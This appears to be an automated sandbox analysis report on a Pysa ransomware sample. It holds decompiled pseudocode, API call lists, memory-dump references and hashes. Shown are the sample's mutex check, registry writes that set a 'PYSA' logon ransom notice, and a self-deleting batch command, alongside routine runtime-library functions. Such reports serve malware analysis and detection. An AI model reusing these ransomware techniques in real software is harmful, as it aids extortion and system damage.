                    0x013c6b30
                    0x013c6b30
                    0x013c6b39
                    0x00000000
                    0x00000000
                    0x013c6b41
                    0x013c6b52
                    0x013c6b53
                    0x013c6b5b
                    0x013c6b67
                    0x013c6b6d
                    0x013c6b73
                    0x013c6b7d
                    0x013c6b8b
                    0x013c6b8e
                    0x013c6b93
                    0x013c6b95
                    0x013c6b9d
                    0x013c6ba3
                    0x013c6ba4
                    0x013c6ba5
                    0x013c6bac
                    0x013c6bbd
                    0x013c6bbe
                    0x013c6bc4
                    0x013c6bc5
                    0x013c6bcc
                    0x013c6bdd
                    0x013c6be4
                    0x013c6be6
                    0x013c6bec
                    0x013c6bf2
                    0x013c6bf8
                    0x013c6bfd
                    0x013c6c09
                    0x013c6c0a
                    0x013c6c0b
                    0x013c6c10
                    0x013c6c1c
                    0x013c6c22
                    0x013c6c23
                    0x013c6c2e
                    0x013c6c3a
                    0x013c6c40
                    0x013c6c46
                    0x013c6b75
                    0x013c6b75
                    0x013c6b77
                    0x00000000
                    0x00000000
                    0x013c6b77
                    0x013c6b73
                    0x013c6b6d
                    0x013c6c4c
                    0x013c6c4c
                    0x013c6c52
                    0x013c6c53
                    0x013c6c54
                    0x013c6c54
                    0x013c6c5f
                    0x013c6c61
                    0x013c6c63
                    0x013c6c6b
                    0x013c6c70
                    0x013c6c88
                    0x013c6c8f
                    0x013c6c91
                    0x013c6c92
                    0x013c6c93
                    0x013c6c94
                    0x013c6c99
                    0x013c6ca6
                    0x013c6ca7
                    0x013c6cb4
                    0x013c6cb5
                    0x013c6cb6
                    0x013c6cea
                    0x013c6cea
                    0x013c6cf7
                    0x013c6d02
                    0x013c6d0d
                    0x013c6d18
                    0x013c6d26
                    0x013c6d34
                    0x013c6d42
                    0x013c6d50
                    0x013c6d50
                    0x013c68aa
                    0x013c6d58
                    0x013c6d65
                    0x013c6d72

                    APIs
                    • wsprintfW.USER32(?,%s%s,?,?,00000000,00001000,78D9F939,00000000,00000000,00000043,?,00000043,00000043,01415DA7,000000FF), ref: 013C6892
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013C69DA
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013C6A06
                    • __floor_pentium4.LIBCMT ref: 013C6A25
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__floor_pentium4wsprintf
                    • String ID: %s%s
                    • API String ID: 4014860136-3252725368
                    • Opcode ID: ff4b51e25ae622940c2db198ca5e9832094604cb0e513bacedd73b6f56c89fe5
                    • Instruction ID: e0635a9a3f75d099d1ad7b1b1846eaa3d500a2897850af17f9e5bf3a61623765
                    • Opcode Fuzzy Hash: ff4b51e25ae622940c2db198ca5e9832094604cb0e513bacedd73b6f56c89fe5
                    • Instruction Fuzzy Hash: 43E16BB1D002699BDB24DB59CC45BEEB7B8EF14744F0041EDE609E6290DB706E94CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E013CA0EF(void* __ecx) {
                    				void* _t2;
                    				void* _t4;
                    				void* _t10;
                    				void* _t12;
                    				CHAR* _t14;
                    
                    				_t10 = __ecx;
                    				FreeConsole(); // executed
                    				_t14 = "Pysa";
                    				_t2 = OpenMutexA(0x1f0001, 0, _t14);
                    				_t16 = _t2;
                    				if(_t2 == 0) {
                    					_t4 = CreateMutexA(0, 0, _t14); // executed
                    					_push(0);
                    					E013CA164(_t10, _t16); // executed
                    					E013CA164(_t10, _t16); // executed
                    					_t12 = 1;
                    					E013CA06D(_t12);
                    					ReleaseMutex(_t4);
                    					E013C9E22();
                    				}
                    				return 0;
                    			}

                    APIs
                    • FreeConsole.KERNEL32 ref: 013CA0F1
                    • OpenMutexA.KERNEL32(001F0001,00000000,Pysa), ref: 013CA105
                    • CreateMutexA.KERNEL32(00000000,00000000,Pysa), ref: 013CA112
                      • Part of subcall function 013CA164: __EH_prolog3_GS.LIBCMT ref: 013CA16B
                      • Part of subcall function 013CA164: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 013CA20C
                      • Part of subcall function 013CA164: HeapAlloc.KERNEL32(00000000), ref: 013CA213
                      • Part of subcall function 013CA164: CreateThread.KERNEL32(00000000,00000000,Function_0000A13F,00000000,00000000,?), ref: 013CA252
                      • Part of subcall function 013CA164: WaitForMultipleObjects.KERNEL32(?,00000000,00000001,000000FF), ref: 013CA293
                      • Part of subcall function 013CA164: CloseHandle.KERNEL32(00000000), ref: 013CA2AC
                      • Part of subcall function 013CA164: GetProcessHeap.KERNEL32(00000000,00000000), ref: 013CA2BB
                      • Part of subcall function 013CA164: HeapFree.KERNEL32(00000000), ref: 013CA2C2
                      • Part of subcall function 013CA06D: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00000002,?), ref: 013CA08F
                      • Part of subcall function 013CA06D: RegSetValueExA.ADVAPI32(?,legalnoticetext,00000000,00000007,0141BC40,0141BC42), ref: 013CA0C0
                      • Part of subcall function 013CA06D: RegSetValueExA.ADVAPI32(?,legalnoticecaption,00000000,00000007,PYSA,00000005), ref: 013CA0D5
                      • Part of subcall function 013CA06D: RegCloseKey.ADVAPI32(?), ref: 013CA0DA
                    • ReleaseMutex.KERNEL32(00000000), ref: 013CA12F
                      • Part of subcall function 013C9E22: GetTempPathA.KERNEL32(00000104,?), ref: 013C9E45
                      • Part of subcall function 013C9E22: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013C9E6F
                      • Part of subcall function 013C9E22: _strrchr.LIBCMT ref: 013C9E93
                      • Part of subcall function 013C9E22: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 013C9EB6
                      • Part of subcall function 013C9E22: wsprintfA.USER32(?,:Repeatdel "%s"if exist "%s" goto Repeatrmdir "%s"del "%s",?,?,?,?), ref: 013C9F27
                    Similarity
                    • API ID: Heap$CreateMutex$CloseFileFreeOpenProcessValue$AllocConsoleH_prolog3_HandleModuleMultipleNameObjectsPathReleaseTempThreadWait_strrchrwsprintf
                    • String ID: Pysa
                    • API String ID: 941924302-2412705946
                    • Opcode ID: 6552f6dc4095f111c9b69ee487294a7b3b5091ee27b6fe44680afe10af583ba2
                    • Instruction ID: ee8cd6afff71107ae527a31b3831ef244469ffd1ad854f0b5e4a9f86069584b1
                    • Opcode Fuzzy Hash: 6552f6dc4095f111c9b69ee487294a7b3b5091ee27b6fe44680afe10af583ba2
                    • Instruction Fuzzy Hash: 80E01A725022A56AD3313B7A7E0CEAB3E78EFE2EF9711001EF409D7155EA694841C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0140D3DE() {
                    				int _v8;
                    				void* __ecx;
                    				void* _t6;
                    				int _t7;
                    				char* _t8;
                    				char* _t13;
                    				int _t17;
                    				void* _t19;
                    				char* _t25;
                    				WCHAR* _t27;
                    
                    				_t27 = GetEnvironmentStringsW();
                    				if(_t27 == 0) {
                    					L7:
                    					_t13 = 0;
                    				} else {
                    					_t6 = E0140D3A7(_t27);
                    					_pop(_t19);
                    					_t17 = _t6 - _t27 >> 1;
                    					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                    					_v8 = _t7;
                    					if(_t7 == 0) {
                    						goto L7;
                    					} else {
                    						_t8 = E0140131B(_t19, _t7); // executed
                    						_t25 = _t8;
                    						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                    							_t13 = 0;
                    						} else {
                    							_t13 = _t25;
                    							_t25 = 0;
                    						}
                    						E014012E1(_t25);
                    					}
                    				}
                    				if(_t27 != 0) {
                    					FreeEnvironmentStringsW(_t27);
                    				}
                    				return _t13;
                    			}

                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0140D3E7
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0140D40A
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0140D430
                    • _free.LIBCMT ref: 0140D443
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0140D452
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                    • String ID:
                    • API String ID: 2278895681-0
                    • Opcode ID: 4088baf5ac76437ca3dde85ec30ebe43012974cf114be805a6d935a0d858edbd
                    • Instruction ID: 407e0818829a5b18c44355ce02c15ccd3ea345f5282c9692a302e0ed2ada7269
                    • Opcode Fuzzy Hash: 4088baf5ac76437ca3dde85ec30ebe43012974cf114be805a6d935a0d858edbd
                    • Instruction Fuzzy Hash: 3301B562A022557B232259FB5C88CBB6E6DDAC2AA4315013EFA04C3294DA709C0581B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E013C7210(signed int __ebx, intOrPtr __ecx) {
                    				signed int _t61;
                    				void* _t76;
                    				void* _t86;
                    				signed int _t91;
                    				intOrPtr _t92;
                    				signed int _t93;
                    				intOrPtr _t94;
                    				intOrPtr _t104;
                    				intOrPtr* _t110;
                    				intOrPtr _t114;
                    				intOrPtr* _t115;
                    				intOrPtr _t116;
                    				intOrPtr _t118;
                    				intOrPtr _t119;
                    				signed int _t121;
                    				char* _t122;
                    				void* _t123;
                    				void* _t124;
                    
                    				_t92 = __ecx;
                    				_push(0x34);
                    				_t61 = E013F26F6(E01415E25);
                    				_t119 = _t92;
                    				 *((intOrPtr*)(_t123 - 0x38)) = _t119;
                    				_t93 =  *(_t123 + 8);
                    				_t91 = __ebx | 0xffffffff;
                    				if((_t61 & 0xffffff00 | _t93 == _t91) == 0) {
                    					_t94 =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x20))));
                    					if(_t94 == 0) {
                    						L5:
                    						if( *((intOrPtr*)(_t119 + 0x4c)) == 0) {
                    							L23:
                    							_t64 = _t91;
                    							L24:
                    							return E013F26B1(_t64);
                    						}
                    						E013C60BF(_t119);
                    						if( *((intOrPtr*)(_t119 + 0x38)) != 0) {
                    							_push(0);
                    							 *((intOrPtr*)(_t123 - 0x1c)) = 0;
                    							 *((char*)(_t123 - 0x2c)) = 0;
                    							 *((char*)(_t123 - 0x14)) =  *(_t123 + 8);
                    							 *((intOrPtr*)(_t123 - 0x18)) = 0xf;
                    							E013C6469(_t91, _t123 - 0x2c, _t110, 8);
                    							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                    							 *((intOrPtr*)(_t123 - 0x3c)) = _t119 + 0x40;
                    							while(1) {
                    								L9:
                    								_t116 =  *((intOrPtr*)(_t123 - 0x18));
                    								while(1) {
                    									_t99 =  >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c;
                    									_t112 =  >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c;
                    									_t72 =  *((intOrPtr*)(_t123 - 0x1c)) + ( >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c);
                    									_t76 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x38)))) + 0x1c))( *((intOrPtr*)(_t123 - 0x3c)), _t123 - 0x14, _t123 - 0x13, _t123 - 0x34,  >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c,  *((intOrPtr*)(_t123 - 0x1c)) + ( >=  ?  *((void*)(_t123 - 0x2c)) : _t123 - 0x2c), _t123 - 0x30);
                    									if(_t76 < 0) {
                    										break;
                    									}
                    									if(_t76 > 1) {
                    										if(_t76 == 3) {
                    											E013C2227( *((intOrPtr*)(_t123 - 0x14)),  *((intOrPtr*)( *((intOrPtr*)(_t123 - 0x38)) + 0x4c)));
                    											_t91 =  !=  ?  *(_t123 + 8) : _t91;
                    										}
                    										break;
                    									}
                    									_t116 =  *((intOrPtr*)(_t123 - 0x18));
                    									_t104 =  *((intOrPtr*)(_t123 - 0x2c));
                    									_t119 =  *((intOrPtr*)(_t123 - 0x38));
                    									_t81 =  >=  ? _t104 : _t123 - 0x2c;
                    									_t114 =  *((intOrPtr*)(_t123 - 0x30)) - ( >=  ? _t104 : _t123 - 0x2c);
                    									 *((intOrPtr*)(_t123 - 0x40)) = _t114;
                    									if(_t114 == 0) {
                    										L15:
                    										 *((char*)(_t119 + 0x3d)) = 1;
                    										if( *((intOrPtr*)(_t123 - 0x34)) != _t123 - 0x14) {
                    											_t91 =  *(_t123 + 8);
                    											break;
                    										}
                    										if(_t114 != 0) {
                    											continue;
                    										}
                    										if( *((intOrPtr*)(_t123 - 0x1c)) >= 0x20) {
                    											break;
                    										}
                    										_push(_t114);
                    										E013C6296(_t91, _t123 - 0x2c, _t114, _t116, 8);
                    										goto L9;
                    									}
                    									_t85 =  >=  ? _t104 : _t123 - 0x2c;
                    									_t86 = E013FE7EA(_t104,  >=  ? _t104 : _t123 - 0x2c, 1, _t114,  *((intOrPtr*)(_t119 + 0x4c)));
                    									_t114 =  *((intOrPtr*)(_t123 - 0x40));
                    									_t124 = _t124 + 0x10;
                    									if(_t114 != _t86) {
                    										break;
                    									}
                    									_t116 =  *((intOrPtr*)(_t123 - 0x18));
                    									goto L15;
                    								}
                    								E013C6118(_t123 - 0x2c, 1, 0);
                    								goto L23;
                    							}
                    						}
                    						_t121 =  *(_t123 + 8);
                    						E013C2227(_t121,  *((intOrPtr*)(_t119 + 0x4c))); // executed
                    						_t91 =  !=  ? _t121 : _t91;
                    						goto L23;
                    					}
                    					_t110 =  *((intOrPtr*)(_t119 + 0x30));
                    					_t118 =  *_t110;
                    					if(_t94 >= _t118 + _t94) {
                    						goto L5;
                    					}
                    					_t64 =  *(_t123 + 8);
                    					 *_t110 = _t118 - 1;
                    					_t115 =  *((intOrPtr*)(_t119 + 0x20));
                    					_t122 =  *_t115;
                    					 *_t115 = _t122 + 1;
                    					 *_t122 =  *(_t123 + 8);
                    					goto L24;
                    				}
                    				_t64 =  !=  ? _t93 : 0;
                    				goto L24;
                    			}

                    Similarity
                    • API ID: H_prolog3_
                    • String ID:
                    • API String ID: 2427045233-3916222277
                    • Opcode ID: 73e4aa32a46a104bf2ce2d318c5dd32b11e988e1c0c30c7b858180b3bdbb1442
                    • Instruction ID: 9220fc251f5bfcca21c69e7d215cd7c4e7e76f0850c6595c1ab2a0af57968a34
                    • Opcode Fuzzy Hash: 73e4aa32a46a104bf2ce2d318c5dd32b11e988e1c0c30c7b858180b3bdbb1442
                    • Instruction Fuzzy Hash: 4E513C31A0020ADFDF15CFA8C8819EEB7B6BF58718F14852EE952A7651E730AD45CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 48%
                    			E013CBA40(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                    				intOrPtr _v0;
                    				intOrPtr _v4;
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				intOrPtr _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				signed int _v44;
                    				char _v68;
                    				char _v76;
                    				char _v84;
                    				char _v92;
                    				char _v100;
                    				char _v108;
                    				char _v120;
                    				signed int _v124;
                    				intOrPtr _v192;
                    				char _v212;
                    				signed int _v216;
                    				intOrPtr _v280;
                    				intOrPtr _v284;
                    				char _v304;
                    				signed int _v308;
                    				intOrPtr _v348;
                    				intOrPtr _v352;
                    				intOrPtr _v356;
                    				intOrPtr _v360;
                    				intOrPtr _v364;
                    				intOrPtr _v376;
                    				signed int _t69;
                    				signed int _t70;
                    				intOrPtr _t73;
                    				void* _t74;
                    				signed int _t79;
                    				signed int _t80;
                    				intOrPtr _t83;
                    				void* _t84;
                    				signed int _t89;
                    				signed int _t90;
                    				intOrPtr _t93;
                    				void* _t94;
                    				signed int _t99;
                    				signed int _t100;
                    				intOrPtr _t103;
                    				void* _t104;
                    				intOrPtr _t108;
                    				void* _t110;
                    				void* _t113;
                    				void* _t116;
                    				void* _t118;
                    				intOrPtr* _t122;
                    				intOrPtr* _t123;
                    				intOrPtr* _t124;
                    				intOrPtr* _t125;
                    				intOrPtr _t142;
                    				intOrPtr _t146;
                    				intOrPtr _t148;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t152;
                    				signed int _t153;
                    				signed int _t158;
                    				signed int _t159;
                    				signed int _t160;
                    				signed int _t161;
                    
                    				_t120 = __ebx;
                    				_t150 = _t158;
                    				_push(0xffffffff);
                    				_push(E01416458);
                    				_push( *[fs:0x0]);
                    				_t159 = _t158 - 0x44;
                    				_t69 =  *0x1435234; // 0x78d9f939
                    				_t70 = _t69 ^ _t150;
                    				_v20 = _t70;
                    				_push(_t70);
                    				 *[fs:0x0] =  &_v16;
                    				_t142 = _a8;
                    				_t73 =  *__ecx;
                    				if( *((intOrPtr*)(_a4 + 0x10)) != 0) {
                    					_t74 =  *((intOrPtr*)(_t73 + 8))( &_v92);
                    					_t122 =  &_v68;
                    					_v16 = 0;
                    					E013CB3C0(__ebx, _t122, __eflags, _t74);
                    					E013F4EC6( &_v68, 0x1431604);
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_push(_t150);
                    					_t151 = _t159;
                    					_push(0xffffffff);
                    					_push(E01416458);
                    					_push( *[fs:0x0]);
                    					_t160 = _t159 - 0x44;
                    					_t79 =  *0x1435234; // 0x78d9f939
                    					_t80 = _t79 ^ _t151;
                    					_v124 = _t80;
                    					_push(_t80);
                    					 *[fs:0x0] =  &_v120;
                    					__eflags =  *(_v100 + 0x10);
                    					_t83 =  *_t122;
                    					if(__eflags != 0) {
                    						_t84 =  *((intOrPtr*)(_t83 + 8))( &_v100);
                    						_t123 =  &_v76;
                    						_v24 = 0;
                    						E013CB3C0(__ebx, _t123, __eflags, _t84);
                    						E013F4EC6( &_v76, 0x1431604);
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_push(_t151);
                    						_t152 = _t160;
                    						_push(0xffffffff);
                    						_push(E01416458);
                    						_push( *[fs:0x0]);
                    						_t161 = _t160 - 0x44;
                    						_t89 =  *0x1435234; // 0x78d9f939
                    						_t90 = _t89 ^ _t152;
                    						_v216 = _t90;
                    						_push(_t90);
                    						 *[fs:0x0] =  &_v212;
                    						__eflags =  *(_v192 + 0x10);
                    						_t93 =  *_t123;
                    						if(__eflags != 0) {
                    							_t94 =  *((intOrPtr*)(_t93 + 8))( &_v108);
                    							_t124 =  &_v84;
                    							_v32 = 0;
                    							E013CB3C0(__ebx, _t124, __eflags, _t94);
                    							E013F4EC6( &_v84, 0x1431604);
                    							asm("int3");
                    							asm("int3");
                    							_push(_t152);
                    							_t153 = _t161;
                    							_push(0xffffffff);
                    							_push(E01416458);
                    							_push( *[fs:0x0]);
                    							_t99 =  *0x1435234; // 0x78d9f939
                    							_t100 = _t99 ^ _t153;
                    							_v308 = _t100;
                    							_push(_t100);
                    							 *[fs:0x0] =  &_v304;
                    							_t146 = _v280;
                    							__eflags =  *(_v284 + 0x10);
                    							_t103 =  *_t124;
                    							if(__eflags != 0) {
                    								_t104 =  *((intOrPtr*)(_t103 + 8))( &_v108);
                    								_t125 =  &_v84;
                    								_v32 = 0;
                    								E013CB3C0(_t120, _t125, __eflags, _t104);
                    								E013F4EC6( &_v84, 0x1431604);
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								asm("int3");
                    								_t148 = _v376;
                    								_t108 =  *_t125;
                    								__eflags =  *(_t148 + 0x10);
                    								if( *(_t148 + 0x10) != 0) {
                    									_v364 = _t148;
                    									goto ( *((intOrPtr*)(_t108 + 0x88)));
                    								}
                    								return  *((intOrPtr*)(_t108 + 0x18))(_v360, _v356, _v352, _v348);
                    							} else {
                    								_t110 =  *((intOrPtr*)(_t103 + 0x14))(_t146, _v12, _v8, _v4);
                    								 *[fs:0x0] = _v40;
                    								__eflags = _v44 ^ _t153;
                    								return E013F268B(_t110, _v44 ^ _t153);
                    							}
                    						} else {
                    							_t113 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 0x30))))(_v8, _v4);
                    							 *[fs:0x0] = _v32;
                    							__eflags = _v36 ^ _t152;
                    							return E013F268B(_t113, _v36 ^ _t152);
                    						}
                    					} else {
                    						_t116 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x2c))))(_v0, _a4, _a8);
                    						 *[fs:0x0] = _v24;
                    						__eflags = _v28 ^ _t151;
                    						return E013F268B(_t116, _v28 ^ _t151);
                    					}
                    				} else {
                    					_t118 =  *((intOrPtr*)(_t73 + 0xc))(_t142);
                    					 *[fs:0x0] = _v16;
                    					return E013F268B(_t118, _v20 ^ _t150);
                    				}
                    			}

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CBAB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID:
                    • API String ID: 2005118841-0
                    • Opcode ID: dafcc20ab03e3a90c32fd1420f6d82237b1cf11ff0f5eb9359ebcf247d5bcf2b
                    • Instruction ID: 7eaf908d901c09b91b9d99417b0e6c206f425545a3ba142e790deffef30ae864
                    • Opcode Fuzzy Hash: dafcc20ab03e3a90c32fd1420f6d82237b1cf11ff0f5eb9359ebcf247d5bcf2b
                    • Instruction Fuzzy Hash: 6A715A71904209EFCB01DFA4D944F9EB7B9FB08B14F10866EF9169B260DB75E904CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E014081B5(signed int _a4, void* _a8, signed int _a12) {
                    				signed int _v8;
                    				long _v12;
                    				struct _OVERLAPPED* _v16;
                    				long _v20;
                    				char _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				intOrPtr _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				intOrPtr _v48;
                    				void* _v52;
                    				void* __ebx;
                    				void* __ebp;
                    				signed int _t62;
                    				intOrPtr _t66;
                    				signed char _t68;
                    				signed int _t69;
                    				signed int _t71;
                    				signed int _t73;
                    				signed int _t74;
                    				signed int _t77;
                    				intOrPtr _t79;
                    				signed int _t81;
                    				signed int _t85;
                    				signed int _t88;
                    				signed int _t102;
                    				signed int _t103;
                    				signed int _t106;
                    				intOrPtr _t108;
                    				signed int _t113;
                    				signed int _t115;
                    				void* _t116;
                    				signed int _t118;
                    				signed int _t120;
                    				signed int _t122;
                    				void* _t123;
                    
                    				_t62 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t62 ^ _t122;
                    				_t106 = _a12;
                    				_v12 = _t106;
                    				_t118 = _a4;
                    				_t116 = _a8;
                    				_v52 = _t116;
                    				if(_t106 != 0) {
                    					__eflags = _t116;
                    					if(_t116 != 0) {
                    						_t102 = _t118 >> 6;
                    						_t115 = (_t118 & 0x0000003f) * 0x30;
                    						_v32 = _t102;
                    						_t66 =  *((intOrPtr*)(0x143a740 + _t102 * 4));
                    						_v48 = _t66;
                    						_v28 = _t115;
                    						_t103 =  *((intOrPtr*)(_t66 + _t115 + 0x29));
                    						__eflags = _t103 - 2;
                    						if(_t103 == 2) {
                    							L6:
                    							_t68 =  !_t106;
                    							__eflags = _t68 & 0x00000001;
                    							if((_t68 & 0x00000001) != 0) {
                    								_t66 = _v48;
                    								L9:
                    								__eflags =  *(_t66 + _t115 + 0x28) & 0x00000020;
                    								if(__eflags != 0) {
                    									E01408E19(_t118, 0, 0, 2);
                    									_t123 = _t123 + 0x10;
                    								}
                    								_t69 = E01407D5A(_t103, _t115, __eflags, _t118);
                    								__eflags = _t69;
                    								if(_t69 == 0) {
                    									_t108 =  *((intOrPtr*)(0x143a740 + _v32 * 4));
                    									_t71 = _v28;
                    									__eflags =  *(_t108 + _t71 + 0x28) & 0x00000080;
                    									if(( *(_t108 + _t71 + 0x28) & 0x00000080) == 0) {
                    										_v24 = 0;
                    										_v20 = 0;
                    										_v16 = 0;
                    										_t73 = WriteFile( *(_t108 + _t71 + 0x18), _t116, _v12,  &_v20, 0); // executed
                    										__eflags = _t73;
                    										if(_t73 == 0) {
                    											_v24 = GetLastError();
                    										}
                    										goto L28;
                    									}
                    									_t85 = _t103;
                    									__eflags = _t85;
                    									if(_t85 == 0) {
                    										E01407DD0( &_v24, _t118, _t116, _v12);
                    										goto L17;
                    									}
                    									_t88 = _t85 - 1;
                    									__eflags = _t88;
                    									if(_t88 == 0) {
                    										_t87 = E01407F9D( &_v24, _t118, _t116, _v12);
                    										goto L17;
                    									}
                    									__eflags = _t88 != 1;
                    									if(_t88 != 1) {
                    										goto L34;
                    									}
                    									_t87 = E01407EAF( &_v24, _t118, _t116, _v12);
                    									goto L17;
                    								} else {
                    									__eflags = _t103;
                    									if(_t103 == 0) {
                    										_t87 = E01407B3A( &_v24, _t118, _t116, _v12);
                    										L17:
                    										L15:
                    										L28:
                    										asm("movsd");
                    										asm("movsd");
                    										asm("movsd");
                    										_t74 = _v40;
                    										__eflags = _t74;
                    										if(_t74 != 0) {
                    											_t75 = _t74 - _v36;
                    											__eflags = _t74 - _v36;
                    											L40:
                    											L41:
                    											return E013F268B(_t75, _v8 ^ _t122);
                    										}
                    										_t77 = _v44;
                    										__eflags = _t77;
                    										if(_t77 == 0) {
                    											_t116 = _v52;
                    											L34:
                    											_t113 = _v28;
                    											_t79 =  *((intOrPtr*)(0x143a740 + _v32 * 4));
                    											__eflags =  *(_t79 + _t113 + 0x28) & 0x00000040;
                    											if(( *(_t79 + _t113 + 0x28) & 0x00000040) == 0) {
                    												L37:
                    												 *((intOrPtr*)(E013FDB3A())) = 0x1c;
                    												_t81 = E013FDB27();
                    												 *_t81 =  *_t81 & 0x00000000;
                    												__eflags =  *_t81;
                    												L38:
                    												_t75 = _t81 | 0xffffffff;
                    												goto L40;
                    											}
                    											__eflags =  *_t116 - 0x1a;
                    											if( *_t116 != 0x1a) {
                    												goto L37;
                    											}
                    											_t75 = 0;
                    											goto L40;
                    										}
                    										_t120 = 5;
                    										__eflags = _t77 - _t120;
                    										if(_t77 != _t120) {
                    											_t81 = E013FDB04(_t77);
                    										} else {
                    											 *((intOrPtr*)(E013FDB3A())) = 9;
                    											_t81 = E013FDB27();
                    											 *_t81 = _t120;
                    										}
                    										goto L38;
                    									}
                    									__eflags = _t103 - 1 - 1;
                    									if(_t103 - 1 > 1) {
                    										goto L34;
                    									}
                    									E01407CED( &_v24, _t116, _v12);
                    									goto L15;
                    								}
                    							}
                    							 *(E013FDB27()) =  *_t95 & 0x00000000;
                    							 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    							_t81 = E013FDA61();
                    							goto L38;
                    						}
                    						__eflags = _t103 - 1;
                    						if(_t103 != 1) {
                    							goto L9;
                    						}
                    						goto L6;
                    					}
                    					 *(E013FDB27()) =  *_t97 & _t116;
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					_t75 = E013FDA61() | 0xffffffff;
                    					goto L41;
                    				}
                    				_t75 = 0;
                    				goto L41;
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
